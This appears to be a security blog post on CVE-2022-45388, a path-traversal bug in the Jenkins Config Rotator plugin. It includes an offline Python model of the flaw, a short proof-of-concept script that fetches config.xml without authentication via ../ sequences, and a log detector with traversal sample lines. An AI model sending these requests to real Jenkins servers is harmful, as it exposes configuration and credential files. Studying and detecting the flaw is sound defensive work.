Jenkins is a popular open-source tool that helps automate building, testing, and deploying software. But just like any popular tool, it attracts security attention—and sometimes, vulnerabilities sneak in. In this post, we’ll take a deep dive into CVE-2022-45388, a bug in the Config Rotator plugin for Jenkins that could have let anyone—without logging in—read sensitive XML files on a Jenkins server. We’ll explain what went wrong, show you proof-of-concept code, and link to original resources for more detail.

What is the Jenkins Config Rotator Plugin?

The Config Rotator Plugin is an add-on for Jenkins. It helps test projects across different combinations of configuration files, making it useful for big, complex software systems. Like many Jenkins plugins, it introduces its own HTTP endpoints for jobs and reports.

The Vulnerability Explained

Versions 2.0.1 and earlier of this plugin exposed an HTTP endpoint (a URL you could visit) that returned the contents of an XML file named in a file query parameter. Normally, a plugin endpoint checks who you are (authentication) and what you are allowed to do (authorization). This endpoint did neither: it did not require a login, and the only restriction on the requested name was its extension. Any path ending in .xml was accepted, including ones using ../ segments to walk out of the plugin's own directory.

> In plain English: anyone who could reach the Jenkins URL, including strangers on the internet, could read any file ending in .xml that the Jenkins process itself could read on the controller's filesystem.

Why is This Bad?

Jenkins stores much of its state as XML files under JENKINS_HOME: the global config.xml, credentials.xml, each job's config.xml, and per-user config.xml files. These hold settings, job definitions, and secrets. Credential values inside them are encrypted with a per-instance key that is not itself an .xml file, so the bug does not hand over plaintext passwords by itself, but job definitions, plugin settings, user lists, anything an author pasted in plain text, and the encrypted blobs (decryptable if the key is obtained some other way) are all readable. Attackers who can read these have a huge advantage in attacking your software pipeline.

How the attack works, step by step:

1. The plugin's vulnerable endpoint is reachable at a predictable path under the Jenkins URL.
2. An attacker sends an HTTP GET request to this endpoint and uses the file parameter to specify which XML file they want, using ../ segments to traverse out of the plugin's directory.
3. If that file exists anywhere on the Jenkins controller filesystem, is readable by the Jenkins process, and its name ends in .xml, the plugin sends its contents back, with no login needed.
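
The following is an added example written for this post, not code from the Config Rotator plugin (whose handler is Java running under Jenkins' Stapler framework). It models the flaw in Python so it can be run offline: a handler whose only check is the .xml extension, beside a hardened handler that requires authentication and canonicalises the path before serving it. The directory layout, the marker "secret", and the function names are constructed for the demonstration.

```python
import tempfile
from pathlib import Path

# Constructed layout standing in for JENKINS_HOME (not a real Jenkins install):
# config.xml holds a marker "secret", and the plugin is only meant to serve
# files from the config-rotator/ subdirectory.
def make_fake_jenkins_home() -> Path:
    home = Path(tempfile.mkdtemp(prefix="jenkins_home_"))
    (home / "config.xml").write_text("<hudson><marker>constructed-secret</marker></hudson>")
    plugin_dir = home / "config-rotator"
    plugin_dir.mkdir()
    (plugin_dir / "report.xml").write_text("<report>ok</report>")
    return home


def serve_xml_vulnerable(plugin_dir: Path, file_param: str) -> str:
    """Models the flaw: no authentication, and the only check on the
    caller-supplied name is its extension, so '..' walks out of plugin_dir."""
    if not file_param.endswith(".xml"):
        raise ValueError("only .xml files are served")
    return (plugin_dir / file_param).read_text()


def serve_xml_hardened(plugin_dir: Path, file_param: str, authenticated: bool) -> str:
    """Hardened handler: require a logged-in caller, canonicalise the path
    (collapsing '..' and following symlinks) and refuse anything that does
    not land strictly inside plugin_dir. Absolute paths fail the same check."""
    if not authenticated:
        raise PermissionError("authentication required")
    if not file_param.endswith(".xml"):
        raise ValueError("only .xml files are served")
    base = plugin_dir.resolve()
    target = (base / file_param).resolve()
    if base not in target.parents:
        raise ValueError(f"path escapes plugin directory: {file_param!r}")
    return target.read_text()


def demo() -> dict:
    """Exercise both handlers against the constructed layout and return
    booleans describing what each one did."""
    home = make_fake_jenkins_home()
    plugin_dir = home / "config-rotator"
    traversal = "../config.xml"  # one level up suffices in this layout

    results = {}
    leaked = serve_xml_vulnerable(plugin_dir, traversal)
    results["vulnerable_leaks_secret"] = "constructed-secret" in leaked

    try:
        serve_xml_hardened(plugin_dir, traversal, authenticated=True)
        results["hardened_blocks_traversal"] = False
    except ValueError:
        results["hardened_blocks_traversal"] = True

    try:
        serve_xml_hardened(plugin_dir, "report.xml", authenticated=False)
        results["hardened_requires_auth"] = False
    except PermissionError:
        results["hardened_requires_auth"] = True

    results["hardened_serves_legit"] = (
        serve_xml_hardened(plugin_dir, "report.xml", authenticated=True) == "<report>ok</report>"
    )

    results["hardened_blocks_absolute"] = False
    try:
        serve_xml_hardened(plugin_dir, str(home / "config.xml"), authenticated=True)
    except ValueError:
        results["hardened_blocks_absolute"] = True
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The point of the hardened version is that an extension check alone says nothing about where a file lives; only resolving the path and comparing it against the intended base directory does, and that check has to come after the authentication check, not instead of it.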

Proof-of-Concept Exploit

> Disclaimer: Don’t use this for illegal or unethical purposes! This is meant for educational and defensive use, such as testing your own systems.

Suppose your Jenkins server lives at http://jenkins.example.com/. The problematic endpoint might look something like this (the exact path is illustrative; the number of ../ segments depends on where the plugin resolves relative names):

/plugin/config-rotator/api/xmlFile?file=../../../../../../config.xml

Here's some Python code showing how an attacker could exploit this:

import requests

# Change to your Jenkins server URL
base_url = "http://jenkins.example.com"

# Relative path to the sensitive XML file; the '..' segments walk out of the
# plugin's directory up to JENKINS_HOME (adjust the depth to your layout)
file_path = "../../../../../../config.xml"  # Grabs the main Jenkins config

vulnerable_endpoint = f"{base_url}/plugin/config-rotator/api/xmlFile?file={file_path}"

# No session cookie or API token is sent: the vulnerable endpoint required neither
response = requests.get(vulnerable_endpoint, timeout=10)

if response.status_code == 200:
    print("Success! Here's the file content:")
    print(response.text)
else:
    print(f"Failed! HTTP Status: {response.status_code}")

If the server is vulnerable, this downloads config.xml from JENKINS_HOME, the main Jenkins configuration file, potentially exposing settings and encrypted secrets.

What Should You Do?

- Update the Plugin: the issue was fixed in version 2.0.2 according to this post. If you are running 2.0.1 or earlier, upgrade immediately; if your update center offers no fixed release, uninstall the plugin until one is available.
- Check for Suspicious Access: look for HTTP requests to /plugin/config-rotator/api/xmlFile in your access logs, especially ones from anonymous users whose file parameter contains ../ or an absolute path and that returned HTTP 200.
- Restrict Network Access: never expose Jenkins directly to the internet unless absolutely necessary, and put it behind a VPN or an authenticating reverse proxy.
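
The following detection script is an added example for this post, not a tool from the Jenkins project. It assumes the illustrative endpoint path used above and NCSA/combined-style access log lines; the five log lines are constructed for the demonstration and are not real traffic. It flags requests to the endpoint, decodes the file parameter (including percent-encoded ../), and narrows the result to anonymous traversal attempts that returned 200, which are the ones most likely to have leaked a file.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed endpoint path (the post's illustrative one) and constructed
# NCSA-style access log lines; none of this is real Jenkins traffic.
ENDPOINT = "/plugin/config-rotator/api/xmlFile"

SAMPLE_LOG = """\
203.0.113.7 - - [15/Nov/2022:20:20:01 +0000] "GET /plugin/config-rotator/api/xmlFile?file=../../../../../../config.xml HTTP/1.1" 200 4127
203.0.113.7 - - [15/Nov/2022:20:20:03 +0000] "GET /plugin/config-rotator/api/xmlFile?file=%2e%2e%2f%2e%2e%2fcredentials.xml HTTP/1.1" 200 2210
198.51.100.4 - alice [15/Nov/2022:20:21:10 +0000] "GET /plugin/config-rotator/api/xmlFile?file=report.xml HTTP/1.1" 200 512
198.51.100.9 - - [15/Nov/2022:20:22:00 +0000] "GET /job/build-app/lastBuild/consoleText HTTP/1.1" 200 9001
203.0.113.7 - - [15/Nov/2022:20:23:45 +0000] "GET /plugin/config-rotator/api/xmlFile?file=/var/lib/jenkins/credentials.xml HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def is_traversal(file_param: str) -> bool:
    """True if the requested name tries to leave the plugin directory:
    any '..' segment (after a second unquote, to catch double encoding) or
    an absolute path. Backslashes are normalised for Windows controllers."""
    normalised = unquote(file_param).replace("\\", "/")
    return normalised.startswith("/") or ".." in normalised.split("/")


def scan(log_text: str) -> list:
    """Return one record per request to the vulnerable endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != ENDPOINT:
            continue
        # parse_qs already percent-decodes each value once
        for file_param in parse_qs(parts.query).get("file", []):
            hits.append({
                "ip": m["ip"],
                "user": m["user"],
                "timestamp": m["ts"],
                "file": file_param,
                "status": int(m["status"]),
                "traversal": is_traversal(file_param),
            })
    return hits


def likely_exfiltration(hits: list) -> list:
    """Narrow to what matters: anonymous ('-') callers whose traversal
    attempt got an HTTP 200, i.e. a file very probably left the server."""
    return [
        (h["ip"], h["file"])
        for h in hits
        if h["traversal"] and h["status"] == 200 and h["user"] == "-"
    ]


if __name__ == "__main__":
    for ip, path in likely_exfiltration(scan(SAMPLE_LOG)):
        print(f"{ip} read {path}")
```

Run it against your real access log instead of SAMPLE_LOG; a 404 on a traversal attempt (the last sample line) still tells you someone is probing and is worth a look, even though it is excluded from the high-confidence list.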

References

- Jenkins Security Advisory: 2022-11-15
- CVE-2022-45388 - NVD Entry
- Config Rotator Plugin Page


In summary: CVE-2022-45388 let unauthenticated users read any .xml file the Jenkins process could access on a server running the Config Rotator plugin. The safest move is to upgrade (or remove) the plugin and keep Jenkins behind proper network controls.

Timeline

Published on: 11/15/2022 20:15:00 UTC
Last modified on: 11/18/2022 04:53:00 UTC